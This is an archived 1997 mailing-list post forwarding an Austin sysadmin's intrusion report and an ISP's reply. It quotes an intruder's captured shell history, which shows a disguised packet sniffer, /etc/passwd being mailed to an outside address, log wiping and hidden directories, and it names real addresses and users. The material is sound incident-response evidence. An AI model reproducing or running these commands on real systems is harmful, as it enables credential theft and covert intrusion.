1997-05-24 - System Attack & FBI (fwd)

Header Data

From: Jim Choate <ravage@EINSTEIN.ssz.com>
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Message Hash: aa689c7b601471a17fd15fef2c3eee6d64da28cc1a62b8458ac25f2cf21183fd
Message ID: <199705240433.XAA22417@einstein.ssz.com>
Reply To: N/A
UTC Datetime: 1997-05-24 05:18:03 UTC
Raw Date: Sat, 24 May 1997 13:18:03 +0800

Raw message

From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 May 1997 13:18:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: System Attack & FBI (fwd)
Message-ID: <199705240433.XAA22417@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi,

For your amusement.

                                       Jim Choate
                                       CyberTects
                                       ravage@ssz.com


Forwarded message:
> From ravage@ssz.com Fri May 23 23:28:29 1997
> From: Jim Choate <ravage@ssz.com>
> Message-Id: <199705240428.XAA22380@einstein.ssz.com>
> Subject: System Attack & FBI
> To: users@einstein.ssz.com
> Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> Cc: staff@einstein.ssz.com
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Content-Length: 7477      
> 
> 
> Hi,
> 
> As you will see below I have been tracking a waskelly wabbit for the last
> few weeks. I apologize for any interference with your access but I could
> not let it go without some sort of responce.
> 
> I *STRONGLY* advise you to change your password immediately.
> 
> I do not expect anyone other than myself to have to talk with the FBI.
> 
> If you have any questions please feel free to email me.
> 
>                                                  Jim Choate
>                                                  CyberTects
>                                                  ravage@ssz.com
> 
> 
> Forwarded message:
> 
> > From rberger@rberger.com Fri May 23 23:13:34 1997
> > Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com>
> > X-Sender: rberger@rberger.com
> > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > Date: Fri, 23 May 1997 23:43:27 -0500
> > To: Jim Choate <ravage@einstein.ssz.com>
> > From: rberger <rberger@rberger.com>
> > Subject: Re: You have a hacker!
> > In-Reply-To: <199705240343.WAA22299@einstein.ssz.com>
> > Mime-Version: 1.0
> > Content-Type: text/plain; charset="us-ascii"
> > 
> > Thank you very much for sending us an e-mail and your logs.   We are going
> > through
> > our FTP logs at this time.   Although initial results don't show
> > corresponding ftps at these
> > times or files.     Although a week ago we were fighting a hacker using the
> > a same
> > techquies as shown by the telnet sessions.   So we will be monitoring
> > everything very
> > closely here for a few more days.  Our next search will be the accounts
> > logged in on
> > these ports at the times given.   We have been working with the FBI, along
> > with several
> > other ISP's in Dallas.   If you capture any other logs please send them
> > again to
> > root@applink.net.   If you dont hear anything from us in less than 24 hours
> > please re-send
> > your e-mail message again to my domain rberger@rberger.com just in case the
> > root e-mail/logs are being monitored & modified.
> > 
> > Regards,
> > 
> > Randall Berger,  CEO
> > AppLink Corporation
> >  
> > 
> > At 10:43 PM 5/23/97 -0500, you wrote:
> > >
> > >Hello,
> > >
> > > 
> > > My name is Jim Choate, I own and operate CyberTects a small office - home
> > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > tracking an intrusion on my system that has involved your systems. I would
> > > appreciate any help you can provide in resolving this issue.
> > > 
> > > I believe a home account for the perp is dkny007@hotmail.com
> > > 
> > > I will attach below the relevant files.
> > > 
> > > 
> > >                                                     Jim Choate
> > >                                                     CyberTects
> > >                                                     ravage@ssz.com
> > > 
> > >  --------------------------------------------------------------------------
> > > 
> > > bbixler   ttyp0        app42-73.applink Fri May 23 16:04 - 16:06  (00:01)
> > > bbixler   ttyp0        app42-75.applink Fri May 23 00:21 - 00:28  (00:07)
> > > bbixler   ttyp0        app42-90.applink Thu May 22 13:33 - 13:37  (00:03)
> > > bbixler   ttyp0        app41-50.applink Wed May 21 20:01 - 20:31  (00:30)
> > > bbixler   ttyp0        app41-47.applink Wed May 21 19:53 - 19:54  (00:00)
> > > bbixler   ttyp0        app42-85.applink Wed May 21 18:46 - 19:00  (00:14)
> > > bbixler   ttyp0        app42-75.applink Wed May 21 10:39 - 10:40  (00:00)
> > > bbixler   ttyp0        app41-52.applink Sun May 18 23:04 - 23:11  (00:07)
> > > bbixler   ttyp1        app42-78.applink Sat May 17 18:46 - 18:49  (00:02)
> > > bbixler   ttyp1        app42-67.applink Sat May 17 01:22 - 01:26  (00:03)
> > > bbixler   ftp          fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28  (00:01)
> > > bbixler   ttyp1        app42-94.applink Tue May 13 16:12 - 16:18  (00:05)
> > > bbixler   ttyp0        app42-85.applink Mon May 12 17:02 - 17:05  (00:02)
> > > bbixler   ttyp0        app42-73.applink Sun May 11 12:29 - 12:36  (00:07)
> > > bbixler   ttyp0        app42-71.applink Sat May 10 20:15 - 20:17  (00:01)
> > > bbixler   ttyp0        app42-71.applink Sat May 10 19:40 - 19:50  (00:09)
> > > bbixler   ttyp0        max2-800-04.eart Wed Feb 12 18:05 - 18:06  (00:00)
> > > 
> > > wtmp begins Sun Feb  2 16:36 
> > > 
> > >  --------------------------------------------------------------------------
> > > 
> > > whoami
> > > ls
> > > mv perl-ex.sh /tmp/.bgg
> > > mkdir /tmp/.bg
> > > cd /tmp
> > > cd .bg
> > > ls
> > > lynx
> > > ls
> > > gcc linsniffer.c 
> > > ls
> > > ps
> > > who
> > > w
> > > ps aux
> > > a.out &
> > > ls
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > tail -f tcp.log 
> > > free
> > > ls
> > > cat tcp.log 
> > > cd ..
> > > ls
> > > w
> > > cd
> > > cd ..
> > > ls
> > > cd ..
> > > cd /etc
> > > ls
> > > minicom
> > > cd ..
> > > ls
> > > cd cdrom.
> > > cd cdrom
> > > ls
> > > cd ..
> > > cd
> > > ls
> > > cd bin
> > > ls
> > > cd ..
> > > cd ..
> > > ls
> > > w
> > > finger
> > > cd Pphantom
> > > cat /etc/passwd | grep Pphantom
> > > cd phantom
> > > ls
> > > ls -al
> > > cat .bash_history 
> > > cd /etc
> > > cat hosts
> > > ls
> > > cd /tmp
> > > cd .bg
> > > cat tcp.log 
> > > exit
> > > cd .bg
> > > ls
> > > w
> > > ls
> > > ls -al
> > > cat tcp.log 
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > exit
> > > mv x.sh /tmp
> > > cd .bg
> > > ls
> > > cd /tmp
> > > ls
> > > mv x.sh .bg
> > > cd .bg
> > > ls
> > > kill -9 14523
> > > ps aux
> > > mv a.out in.telnetd
> > > ls
> > > rm tcp.log 
> > > ./in.telnetd &
> > > exit
> > > pico tcp.log 
> > > ls
> > > ps aux
> > > kill -9 16282
> > > ls
> > > ./in.telnetd &
> > > exit
> > > cat /dev/null > tcp.log
> > > w
> > > exit
> > > pico tcp.log 
> > > ls
> > > ls -al
> > > cd /etc
> > > cat passwd
> > > mail dkny007@hotmail.com < passwd
> > > exit
> > > w
> > > ls -al
> > > pico tcp.log 
> > > echo /dev/null > tcp.log 
> > > ls -al
> > > ps aux
> > > quit
> > > exit
> > > id
> > > w
> > > ftp 
> > > ls
> > > mkdir /home/ftp/.tmp
> > > mkdir /home/ftp/.tmp/.sub
> > > mv linsniff /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub/
> > > mv linsniff in.te1netd
> > > ls -l
> > > chmod 755 in.te1netd 
> > > in.te1netd &
> > > ps
> > > ps aux
> > > killall in.te1netd
> > > ls
> > > ls -a
> > > ls -l
> > > in.te1netd &
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > ls -s
> > > rm in.te1netd 
> > > cd
> > > ls
> > > mv hello .h311o
> > > ftp 
> > > ls
> > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub
> > > ls
> > > cc linsniffer.c 
> > > mv a.out in.te1netd
> > > chmod 755 in.te1netd 
> > > ls
> > > rm linsniffer.c 
> > > in.te1netd &
> > > exit
> > > cd ..
> > > mv apache.tgz .bg
> > > cd .bg
> > > ls
> > > tar xfvz apache.tgz 
> > > cd apache_1.2b10/
> > > ls
> > > cd src
> > > make
> > > ls
> > > ./Configure 
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd cgi-bin/
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > w
> > > rm -rf apache*
> > > lynx
> > > ls
> > > tar xfvz apache_1.1.3.tar.gz 
> > > cd apache_1.1.3
> > > ls
> > > cd src
> > > ls
> > > ./Configure 
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > rm -rf apache_1.1.3
> > > ls
> > > rm -rf apache_1.1.3.tar.gz 
> > > w
> > > exit
> > > kill -9 14551
> > > ls
> > > ls -al
> > > cd ..
> > > ls
> > > cd /home
> > > ls
> > > cd ftp
> > > ls -al
> > > cd .tm[p
> > > cd .tmp/
> > > ls
> > > ls -al
> > > cd .sub/
> > > ls
> > > rm *
> > > cd ..
> > > cd ..
> > > rm -rf .tmp/
> > > ls
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd ssz
> > > ls
> > > cd ..
> > > ls
> > > cd pgp
> > > ls
> > > cd ..
> > > cd etc
> > > ls
> > > cd ..
> > > ls
> > > cd /
> > > ls
> > > exit
> > > id
> > > crontab -e
> > > ls
> > > vi .sub
> > > crontab -e
> > > ls
> > > cat /home/ftp/.tmp/.sub/tcp.log
> > > ps aux
> > > who
> > > cd /home/ftp
> > > ls -a
> > > mkdir .tmp/.sub
> > > mkdir .tmp
> > > cd .tmp
> > > exit
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd khg-0.5/
> > > ls
> > > cd ..
> > > cat .bash_history 
> > > ls
> > > cd /etc
> > > ls
> > > cat hosts
> > > exit
> > > 
> > >
> > >
> > >
> > 
> 






Thread